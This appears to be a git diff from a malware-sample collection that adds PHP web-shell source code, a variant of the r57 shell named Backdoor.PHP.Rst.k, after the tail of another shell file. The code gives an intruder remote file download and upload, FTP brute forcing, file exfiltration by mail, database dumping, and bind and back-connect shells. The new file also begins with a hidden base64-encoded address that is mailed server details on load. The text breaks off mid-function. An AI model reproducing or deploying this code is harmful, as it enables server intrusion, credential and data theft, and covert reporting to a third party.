sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://')); +echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te.'</div>'.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts; +echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14'])); +$arh = $lang[$language.'_text92']; +if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; } +if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; } +if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; } +echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo $te.'</div>'.$table_end1.$fe; +if(@function_exists("ftp_connect")){ +echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down')); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21")))); +echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous")))); +echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up')); +echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir)); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($unix && @function_exists("ftp_connect")){ +echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts; +echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>"); +echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']); +echo $te.'</div>'.$table_end1.$fe; +} +if(@function_exists("mail")){ +echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy")))); +echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>'); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>"; +echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir)); +echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com")))); +echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell")))); +echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir)); +echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh); +echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +if($mysql_on||$mssql_on||$pg_on||$ora_on) +{ +$select = '<select name=db>'; +if($mysql_on) $select .= '<option>MySQL</option>'; +if($mssql_on) $select .= '<option>MSSQL</option>'; +if($pg_on) $select .= '<option>PostgreSQL</option>'; +if($ora_on) $select .= '<option>Oracle</option>'; +$select .= '</select>'; +echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user")))); +echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql")))); +echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9'])); +echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>"; +echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select); +echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306")))); +echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password")))); +echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql")))); +echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),""); +echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>"; +} +if(!$safe_mode&&!$windows){ +echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")))); +echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4'])); +echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts; +echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>"; +echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457')); +echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru')); +echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667')); +echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir)); +echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5'])); +echo $te."</td>".$fe."</tr></div></table>"; +} +echo '</table>'.$table_up3."</div></div></td></tr></table>".$f; +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.Rst.k b/PHP/Backdoor.PHP.Rst.k new file mode 100644 index 00000000..9baa1370 --- /dev/null +++ b/PHP/Backdoor.PHP.Rst.k @@ -0,0 +1,2220 @@ +<?php +// Dont Change This Configurattions!!! +$creator=base64_decode("ZW1haWx4eHVzZXJAZ21haWwuY29t"); +($safe_mode)?($safez="SAFEMODE-ON"):($safez="SAFEMODE-OFF"); +$base="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; +$name = php_uname(); $ip = getenv("REMOTE_ADDR"); $ip2 = gethostbyaddr($_SERVER[REMOTE_ADDR]); $subj = +$_SERVER['HTTP_HOST']; +$msg = "\nBASE: $base\nuname a: $name\nBypass: $bypasser\nIP: $ip\nHost: $ip2 $pwds"; +$from ="From: ".$writ."___=".$safez."<tool@".$_SERVER['HTTP_HOST'].">"; +mail( $creator, $subj, $msg, $from); +$language='eng'; + +// ?????????????? | Authentification +// $auth = 1; - ?????????????? ???????? ( authentification = On ) +// $auth = 0; - ?????????????? ????????? ( authentification = Off ) +$auth = 0; + +// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access) +// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!) +// ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57' +// Login & password crypted with md5, default is 'r57' +$name='e79ec2c5c152b12fbd320771535cdbd1'; // ????? ???????????? (user login) +$pass='c7c5231523105089296465342e627f50'; // ?????? ???????????? (user password) +/******************************************************************************************************/ +error_reporting(0); +set_magic_quotes_runtime(0); +@set_time_limit(0); +@ini_set('max_execution_time',0); +@ini_set('output_buffering',0); +$safe_mode = @ini_get('safe_mode'); +$version = 'DAL.net'; +if(version_compare(phpversion(), '4.1.0') == -1) + { + $_POST = &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + $_COOKIE = &$HTTP_COOKIE_VARS; + } +if (@get_magic_quotes_gpc()) + { + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } + } + +if($auth == 1) { +if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass) + { + header('WWW-Authenticate: Basic realm="KoncEx"'); + header('HTTP/1.0 401 Unauthorized'); + exit("<b><a href=http://ripperzcrewz.com>xx_user</a> : Access Denied</b>"); + } +} +$head = '<!-- ??????????, ???? --> +<html> +<head> +<title> xx_user </title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> + +<STYLE> +body,td,th { + color: #EFEE59; +} +body { + background-color: #000000; +} +font { + color: #26EDEF; + +} +tr { +BORDER-RIGHT: #008010 1px solid; +BORDER-TOP: #066B01 1px solid; +BORDER-LEFT: #066B01 1px solid; +BORDER-BOTTOM: #008010 1px solid; +} +td { +BORDER-RIGHT: #008010 0px solid; +BORDER-TOP: #066B01 0px solid; +BORDER-LEFT: #066B01 0px solid; +BORDER-BOTTOM: #26A736 0px solid; +} +.table1 { +BORDER-RIGHT: #000000 0px; +BORDER-TOP: #000000 0px; +BORDER-LEFT: #000000 0px; +BORDER-BOTTOM: #000000 0px; +BACKGROUND-COLOR: #000000; +COLOR : #97DEF3; +} +.td1 { +BORDER-RIGHT: #000000 1px; +BORDER-TOP: #000000 1px; +BORDER-LEFT: #000000 1px; +BORDER-BOTTOM: #000000 1px; +font: 5pt Verdana bold; +} +.tr1 { +BORDER-RIGHT: #000000 1px; +BORDER-TOP: #000000 1px; +BORDER-LEFT: #000000 1px; +BORDER-BOTTOM: #000000 1px; +} +table { +BORDER-RIGHT: #066B01 1px outset; +BORDER-TOP: #066B01 1px outset; +BORDER-LEFT: #066B01 1px outset; +BORDER-BOTTOM: #066B01 1px outset; +BACKGROUND-COLOR: #170017; +COLOR : #29F829; +} +input { +BORDER-RIGHT: #000000 1px solid; +BORDER-TOP: #0C0077 1px solid; +BORDER-LEFT: #5D4BF9 1px solid; +BORDER-BOTTOM: #000000 1px solid; +BACKGROUND-COLOR: #000000; +COLOR : #43EA43; +font: 8pt Verdana bold; +} +select { +BORDER-RIGHT: #000000 1px solid; +BORDER-TOP: #0C0077 1px solid; +BORDER-LEFT: #0C0077 1px solid; +BORDER-BOTTOM: #000000 1px solid; +BACKGROUND-COLOR: #000000; +COLOR : #00FF00; + +} +submit { +BORDER-RIGHT: buttonhighlight 1px outset; +BORDER-TOP: buttonhighlight 1px outset; +BORDER-LEFT: buttonhighlight 1px outset; +BORDER-BOTTOM: buttonhighlight 1px outset; +BACKGROUND-COLOR: #0A4A00; +COLOR : #A0E2F5; +width: 30%; +} +textarea { +BORDER-RIGHT: #000000 1px solid; +BORDER-TOP: #0C0077 1px solid; +BORDER-LEFT: #0C0077 1px solid; +BORDER-BOTTOM: #000000 1px solid; +BACKGROUND-COLOR: #000000; +COLOR : #00FF00; +font: Fixedsys bold; +} +BODY { +margin-top: 0px; +margin-right: 0px; +margin-bottom: 0px; +margin-left: 0px; +} + +A:link {COLOR:yellow; TEXT-DECORATION: none} +A:visited { COLOR:green; TEXT-DECORATION: none} +A:active {COLOR:green; TEXT-DECORATION: none} +A:hover {color:red;TEXT-DECORATION: none} + +.td1 { +BORDER: 2px; +font: 7pt Verdana; +color: #EB0F4D; +} +.tr1 { +BORDER: 1px; +color: #A0FBF4; +} + +</STYLE> +<script language=\'javascript\'> +function hide_div(id) +{ + document.getElementById(id).style.display = \'none\'; + document.cookie=id+\'=0;\'; +} +function show_div(id) +{ + document.getElementById(id).style.display = \'block\'; + document.cookie=id+\'=1;\'; +} +function change_divst(id) +{ + if (document.getElementById(id).style.display == \'none\') + show_div(id); + else + hide_div(id); +} +</script>'; +class zipfile +{ + var $datasec = array(); + var $ctrl_dir = array(); + var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; + var $old_offset = 0; + function unix2DosTime($unixtime = 0) { + $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); + if ($timearray['year'] < 1980) { + $timearray['year'] = 1980; + $timearray['mon'] = 1; + $timearray['mday'] = 1; + $timearray['hours'] = 0; + $timearray['minutes'] = 0; + $timearray['seconds'] = 0; + } + return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | + ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); + } + function addFile($data, $name, $time = 0) + { + $name = str_replace('\\', '/', $name); + $dtime = dechex($this->unix2DosTime($time)); + $hexdtime = '\x' . $dtime[6] . $dtime[7] + . '\x' . $dtime[4] . $dtime[5] + . '\x' . $dtime[2] . $dtime[3] + . '\x' . $dtime[0] . $dtime[1]; + eval('$hexdtime = "' . $hexdtime . '";'); + $fr = "\x50\x4b\x03\x04"; + $fr .= "\x14\x00"; + $fr .= "\x00\x00"; + $fr .= "\x08\x00"; + $fr .= $hexdtime; + $unc_len = strlen($data); + $crc = crc32($data); + $zdata = gzcompress($data); + $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); + $c_len = strlen($zdata); + $fr .= pack('V', $crc); + $fr .= pack('V', $c_len); + $fr .= pack('V', $unc_len); + $fr .= pack('v', strlen($name)); + $fr .= pack('v', 0); + $fr .= $name; + $fr .= $zdata; + $this -> datasec[] = $fr; + $cdrec = "\x50\x4b\x01\x02"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x14\x00"; + $cdrec .= "\x00\x00"; + $cdrec .= "\x08\x00"; + $cdrec .= $hexdtime; + $cdrec .= pack('V', $crc); + $cdrec .= pack('V', $c_len); + $cdrec .= pack('V', $unc_len); + $cdrec .= pack('v', strlen($name) ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('v', 0 ); + $cdrec .= pack('V', 32 ); + $cdrec .= pack('V', $this -> old_offset ); + $this -> old_offset += strlen($fr); + $cdrec .= $name; + $this -> ctrl_dir[] = $cdrec; + } + function file() + { + $data = implode('', $this -> datasec); + $ctrldir = implode('', $this -> ctrl_dir); + return + $data . + $ctrldir . + $this -> eof_ctrl_dir . + pack('v', sizeof($this -> ctrl_dir)) . + pack('v', sizeof($this -> ctrl_dir)) . + pack('V', strlen($ctrldir)) . + pack('V', strlen($data)) . + "\x00\x00"; + } +} +function compress(&$filename,&$filedump,$compress) + { + global $content_encoding; + global $mime_type; + if ($compress == 'bzip' && @function_exists('bzcompress')) + { + $filename .= '.bz2'; + $mime_type = 'application/x-bzip2'; + $filedump = bzcompress($filedump); + } + else if ($compress == 'gzip' && @function_exists('gzencode')) + { + $filename .= '.gz'; + $content_encoding = 'x-gzip'; + $mime_type = 'application/x-gzip'; + $filedump = gzencode($filedump); + } + else if ($compress == 'zip' && @function_exists('gzcompress')) + { + $filename .= '.zip'; + $mime_type = 'application/zip'; + $zipfile = new zipfile(); + $zipfile -> addFile($filedump, substr($filename, 0, -4)); + $filedump = $zipfile -> file(); + } + else + { + $mime_type = 'application/octet-stream'; + } + } +function mailattach($to,$from,$subj,$attach) + { + $headers = "From: $from\r\n"; + $headers .= "MIME-Version: 1.0\r\n"; + $headers .= "Content-Type: ".$attach['type']; + $headers .= "; name=\"".$attach['name']."\"\r\n"; + $headers .= "Content-Transfer-Encoding: base64\r\n\r\n"; + $headers .= chunk_split(base64_encode($attach['content']))."\r\n"; + if(@mail($to,$subj,"",$headers)) { return 1; } + return 0; + } +class my_sql + { + var $host = 'localhost'; + var $port = ''; + var $user = ''; + var $pass = ''; + var $base = ''; + var $db = ''; + var $connection; + var $res; + var $error; + var $rows; + var $columns; + var $num_rows; + var $num_fields; + var $dump; + + function connect() + { + switch($this->db) + { + case 'MySQL': + if(empty($this->port)) { $this->port = '3306'; } + if(!function_exists('mysql_connect')) return 0; + $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); + if(is_resource($this->connection)) return 1; + break; + case 'MSSQL': + if(empty($this->port)) { $this->port = '1433'; } + if(!function_exists('mssql_connect')) return 0; + $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); + if($this->connection) return 1; + break; + case 'PostgreSQL': + if(empty($this->port)) { $this->port = '5432'; } + $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; + if(!function_exists('pg_connect')) return 0; + $this->connection = @pg_connect($str); + if(is_resource($this->connection)) return 1; + break; + case 'Oracle': + if(!function_exists('ocilogon')) return 0; + $this->connection = @ocilogon($this->user, $this->pass, $this->base); + if(is_resource($this->connection)) return 1; + break; + } + return 0; + } + + function select_db() + { + switch($this->db) + { + case 'MySQL': + if(@mysql_select_db($this->base,$this->connection)) return 1; + break; + case 'MSSQL': + if(@mssql_select_db($this->base,$this->connection)) return 1; + break; + case 'PostgreSQL': + return 1; + break; + case 'Oracle': + return 1; + break; + } + return 0; + } + + function query($query) + { + $this->res=$this->error=''; + switch($this->db) + { + case 'MySQL': + if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) + { + $this->error = @mysql_error($this->connection); + return 0; + } + else if(is_resource($this->res)) { return 1; } + return 2; + break; + case 'MSSQL': + if(false===($this->res=@mssql_query($query,$this->connection))) + { + $this->error = 'Query error'; + return 0; + } + else if(@mssql_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'PostgreSQL': + if(false===($this->res=@pg_query($this->connection,$query))) + { + $this->error = @pg_last_error($this->connection); + return 0; + } + else if(@pg_num_rows($this->res) > 0) { return 1; } + return 2; + break; + case 'Oracle': + if(false===($this->res=@ociparse($this->connection,$query))) + { + $this->error = 'Query parse error'; + } + else + { + if(@ociexecute($this->res)) + { + if(@ocirowcount($this->res) != 0) return 2; + return 1; + } + $error = @ocierror(); + $this->error=$error['message']; + } + break; + } + return 0; + } + function get_result() + { + $this->rows=array(); + $this->columns=array(); + $this->num_rows=$this->num_fields=0; + switch($this->db) + { + case 'MySQL': + $this->num_rows=@mysql_num_rows($this->res); + $this->num_fields=@mysql_num_fields($this->res); + while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); + @mysql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'MSSQL': + $this->num_rows=@mssql_num_rows($this->res); + $this->num_fields=@mssql_num_fields($this->res); + while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); + @mssql_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}; + break; + case 'PostgreSQL': + $this->num_rows=@pg_num_rows($this->res); + $this->num_fields=@pg_num_fields($this->res); + while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); + @pg_free_result($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + case 'Oracle': + $this->num_fields=@ocinumcols($this->res); + while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; + @ocifreestatement($this->res); + if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;} + break; + } + return 0; + } + function dump($table) + { + if(empty($table)) return 0; + $this->dump=array(); + $this->dump[0] = '##'; + $this->dump[1] = '## --------------------------------------- '; + $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s"); + $this->dump[3] = '## Database: '.$this->base; + $this->dump[4] = '## Table: '.$table; + $this->dump[5] = '## --------------------------------------- '; + switch($this->db) + { + case 'MySQL': + $this->dump[0] = '## MySQL dump'; + if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + $this->dump[] = $this->rows[0]['Create Table']; + $this->dump[] = '## --------------------------------------- '; + if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);} + $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'MSSQL': + $this->dump[0] = '## MSSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'PostgreSQL': + $this->dump[0] = '## PostgreSQL dump'; + if($this->query('SELECT * FROM '.$table)!=1) return 0; + if(!$this->get_result()) return 0; + for($i=0;$i<$this->num_rows;$i++) + { + foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);} + $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; + } + break; + case 'Oracle': + $this->dump[0] = '## ORACLE dump'; + $this->dump[] = '## under construction'; + break; + default: + return 0; + break; + } + return 1; + } + function close() + { + switch($this->db) + { + case 'MySQL': + @mysql_close($this->connection); + break; + case 'MSSQL': + @mssql_close($this->connection); + break; + case 'PostgreSQL': + @pg_close($this->connection); + break; + case 'Oracle': + @oci_close($this->connection); + break; + } + } + function affected_rows() + { + switch($this->db) + { + case 'MySQL': + return @mysql_affected_rows($this->res); + break; + case 'MSSQL': + return @mssql_affected_rows($this->res); + break; + case 'PostgreSQL': + return @pg_affected_rows($this->res); + break; + case 'Oracle': + return @ocirowcount($this->res); + break; + default: + return 0; + break; + } + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name'])) + { + if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; } + else + { + @ob_clean(); + $filename = @basename($_POST['d_name']); + $filedump = @fread($file,@filesize($_POST['d_name'])); + fclose($file); + $content_encoding=$mime_type=''; + compress($filename,$filedump,$_POST['compress']); + if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); } + header("Content-type: ".$mime_type); + header("Content-disposition: attachment; filename=\"".$filename."\";"); + echo $filedump; + exit(); + } + } +if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); } +if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query") + { + echo $head; + $sql = new my_sql(); + $sql->db = $_POST['db']; + $sql->host = $_POST['db_server']; + $sql->port = $_POST['db_port']; + $sql->user = $_POST['mysql_l']; + $sql->pass = $_POST['mysql_p']; + $sql->base = $_POST['mysql_db']; + $querys = @explode(';',$_POST['db_query']); + echo '<body bgcolor=#e4e0d8>'; + if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>"; + else + { + if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>"; + else + { + foreach($querys as $num=>$query) + { + if(strlen($query)>5) + { + echo 